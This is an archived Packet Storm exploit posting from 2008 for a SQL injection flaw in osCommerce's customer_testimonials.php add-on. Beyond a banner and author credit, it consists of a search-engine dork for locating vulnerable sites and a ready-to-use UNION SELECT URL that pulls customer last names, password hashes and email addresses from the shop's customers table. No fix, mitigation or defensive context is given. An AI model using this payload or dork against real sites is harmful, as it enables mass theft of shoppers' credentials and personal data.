Lucene search
It's myPACKETSTORM:63357HistoryFeb 07, 2008 - 12:00 a.m.
oscom-sql.txt
2008-02-0700:00:00
it's my
packetstormsecurity.com
19
`#########################################################
##
## osCommerce SQL Injection (customer_testimonials.php)
##
##
## Author: it's my
##
## Home page: http://www.antichat.ru
##
#########################################################
##
## Dork: inurl:"customer_testimonials.php"
##
#########################################################
Exploit:
http://site.com/customer_testimonials.php?testimonial_id=99999+union+select+1,2,concat(customers_lastname,0x3a,customers_password,0x3a,customers_email_address),4,5,6,7,8+from+customers/*
#########################################################
## it's my sick world =/ #### www.antichat.ru
#########################################################
source: http://addons.oscommerce.com/info/5477
`